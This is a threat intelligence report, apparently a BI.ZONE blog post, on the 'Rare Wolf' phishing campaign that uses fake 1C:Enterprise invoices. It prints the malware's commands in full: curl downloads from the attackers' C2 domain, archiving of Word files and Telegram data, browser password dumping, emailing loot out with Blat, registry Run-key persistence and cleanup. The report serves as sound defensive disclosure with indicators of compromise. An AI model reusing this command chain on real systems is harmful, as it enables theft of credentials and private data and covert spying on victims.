Rare Wolf preys on sensitive data using fake 1C:Enterprise invoices as lure

BI.ZONE
5 min readNov 29, 2023

How adversaries create diversions and stay invisible

BI.ZONE Threat Intelligence specialists have discovered a cybercriminal group that has been active since at least 2019. While this cluster of activity was previously directed against the countries neighboring Russia, now such attacks have reached Russia itself. The attackers use phishing emails to install a legitimate monitoring tool, Mipko Employee Monitor, on target devices and gain access to the Telegram messenger, steal sensitive documents and passwords.

Key findings

  1. Unusual attachment formats tend to lower the victim’s guard and increase the likelihood of a compromise.
  2. Hacking and stealing Telegram accounts is particularly popular, besides accessing user data is as easy as copying a single folder.
  3. Attackers make extensive use of legitimate monitoring tools. This allows them to go undercover inside the compromised IT infrastructure.

Campaign

The criminals sent phishing emails with archives that contained, as they claimed, 1C:Enterprise invoices and their digital keys. This enabled them to distract the victims from noticing the file extension. The content of the message is shown in the figure below.

The phishing email text

The archive contained an executable 1C.Предприятие Платежная накладная №579823592352-2023.scr, which was the installer for Smart Install Maker.

Running the executable file caused the following actions:

  • Creation of a folder C:\Intel\ and assigning the attributes Hidden, System, Unindexed.
  • Creation of keys Video Configurations and Mail Configurations in the registry hive Software\Microsoft\Windows\CurrentVersion\Run. The key values were set as file paths C:\Intel\go.exe and C:\Intel\mail.exe that would be unpacked later.
  • Creation of a file C:\Intel\rezet.cmd, downloading encrypted archives from the C2 server using cURL and driver.exe to unpack them:
C:\Intel\curl.exe -o C:\Intel\driver.exe http://acountservices[.]nl/downs/driver.exe
C:\Intel\curl.exe -o C:\Intel\keys.rar http://acountservices[.]nl/downs/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar http://acountservices[.]nl/downs/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar http://acountservices[.]nl/downs/pas.rar

In addition, driver.exe served to collect and archive all Microsoft Word documents:

C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\doc.rar C:\*.doc* /y

Telegram messenger data was also collected and packaged:

C:\Intel\driver.exe a -r -hplimpid2903392 C:\Intel\tdata.rar "C:\Users\[user]\AppData\Roaming\Telegram Desktop\tdata" /y

The attackers sent the collected data through a controlled mail service. For this purpose, they extracted the Blat utility from the pas.rar archive and used it to send emails through the command line:

C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar blat.exe C:\Intel\ /y

Then both archives were sent to the attackers’ email account:

C:\Intel\blat.exe -to %mail-in% -f "TELEGRAM<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\tdata.rar"
C:\Intel\blat.exe -to %mail-in% -f "DOCUMENT<%mail-out%>" -server smtp.acountservices[.]nl -port 587 -u %mail-out% -pw %pass-out% -subject "[redacted]" -body "[redacted]" -attach "C:\Intel\doc.rar"

After sending, the archives with the collected data and the cURL utility were deleted:

del /q C:\Intel\curl.exe
del /q /f C:\Intel\doc.rar
del /q /f C:\Intel\tdata.rar

Next, the go.exe file was extracted from the keys.rar archive. Execution was suspended for an hour using the ping utility after which the files mail.exe and userprofile.exe were extracted from the archives. The latter was launched to install Mipko Employee Monitor software in the compromised system:

C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar go.exe C:\Intel\ /y
ping -n 3600 127.0.0.1
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\pas.rar mail.exe C:\Intel\ /y
C:\Intel\driver.exe e -hplimpid2903392 C:\Intel\keys.rar userprofile.exe C:\Intel\ /y
C:\Intel\userprofile.exe

At this point, the system was forced to reboot and the rezet.cmd file was deleted:

wmic OS WHERE Primary="TRUE" CALL Win32Shutdown 6
del /q C:\Intel\rezet.cmd

After rebooting, the files mail.exe and go.exe were executed.

Launching mail.exe led to the following actions:

  • Passwords from browsers on the compromised device were collected into a password.txt file. To do this, the software WebBrowserPassView was extracted from the archive pas.rar:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\pas.rar wbpv.exe C:\Intel\ /y
C:\Intel\wbpv.exe /stext "C:\Intel\password.txt"
  • Once the passwords were retrieved, the files that were no longer required for execution were deleted:
del /q /f С:\Intel\wbpv.exe
del /q /f C:\Intel\pas.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\driver.exe
  • The registry key responsible for mail.exe autorun was also deleted:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Mail Configurations" /f
  • This was followed by checking the availability of the network resource www.msftncsi.com/ncsi.txt. If the check was successful, the obtained user credentials would be emailed to the attacker using the Blat utility:
curl www.msftncsi.com/ncsi.txt >nul
if "%errorlevel%"=="0" (
goto ok
) else (
goto no
)
:ok
C:\Intel\blat.exe -to %mail-in% -f "PASSWORD<%mail-out%>" -server [REDACTED] -port 587 -u %mail-out% -pw %pass-out% -subject "Password %COMPUTERNAME%/%USERNAME%" -body "Password %COMPUTERNAME%/%USERNAME%" -attach "C:\Intel\password.txt"
  • The files go.exe, password.txt, and blat.exe were deleted at this point:
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\password.txt
del /q /f C:\Intel\blat.exe

Running go.exe triggered the following actions:

  • Remove the Mipko Employee Monitor configuration if it is present on the system:
del /q /f %PROGRAMDATA%\MPK\S0000
  • Unpack all keys.rar files into the C:\Intel folder:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\keys.rar C:\Intel\ /y
  • Unpack the MPK.rar archive containing the connection configuration into folder C:\Users\[user]\AppData\Local\:
C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\MPK.rar %PROGRAMDATA%  /y
  • Move the file from C:\Users\[user]\AppData\Local\MPK\S0000.txt to C:\Users\[user]\AppData\Local\MPK\S0000:
ren %PROGRAMDATA% \MPK\S0000.txt %PROGRAMDATA% \MPK\S0000
  • Add the Userinit key in the registry hive HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to launch Mipko Employee Monitor at system startup:
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Userinit /t reg_sz /d "C:\Intel\userprofile.exe" /f
  • Launch Mipko Employee Monitor:
start C:\Intel\userprofile.exe
  • Delete temporary files that may be in the folder C:\Intel\:
del /q /f C:\Intel\MPK.rar
del /q /f C:\Intel\keys.rar
del /q /f C:\Intel\curl.exe
del /q /f C:\Intel\dc.exe
del /q /f C:\Intel\dc.rar
del /q /f C:\Intel\rezet.cmd
del /q /f C:\Intel\open.lnk
del /q /f C:\Intel\go.exe
del /q /f C:\Intel\go1.exe
del /q /f C:\Intel\mail.exe
  • Delete the registry key responsible for the autorun of go.exe:
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Video Configurations" /f

The Mipko Employee Monitor software allows attackers to monitor user activity, intercept keystrokes and clipboard logs, record screen activity and device camera.

Conclusion

Cybercriminals continue to leverage dual-use software and legitimate tools to launch targeted attacks. This often allows them to blend into the compromised IT infrastructure and bypass multiple defenses. In addition, it is important to monitor the threat landscape of neighboring countries: attackers may change their targets over time, influenced by geopolitical events, among other things.

MITRE ATT&CK

Indicators of compromise

  • acountservices[.]nl
  • 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56
  • e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86
  • e1e9b7182717f6851e7deb0aadf8f31c67bf43e2d8ef5b052e697f467ec2e3f3
  • 4999f77a5a52d79dbb4b14dd7035aed21aecf85631ea20b91d7adf97f7b729e8
  • a49092711a56efc520416e53bbc9891092d1d970e154b923b7603083bbd7d870
  • a9eeffdad26eabe90fc32a79700af671daefd43eb7ecfb8f20ce4e667cbd8dcb

A full list of the indicators of compromise is available to the users of BI.ZONE Threat Intelligence.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

Legitimate tools are applied more and more often today to attack companies. Preventive defenses do not detect such methods — the intruders penetrate the infrastructure unnoticed. To discover such attacks, we recommend that companies implement detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their security operations center.

--

--

BI.ZONE

BI.ZONE: an expert in digital risks management. We help organizations around the world to develop their businesses safely in the digital age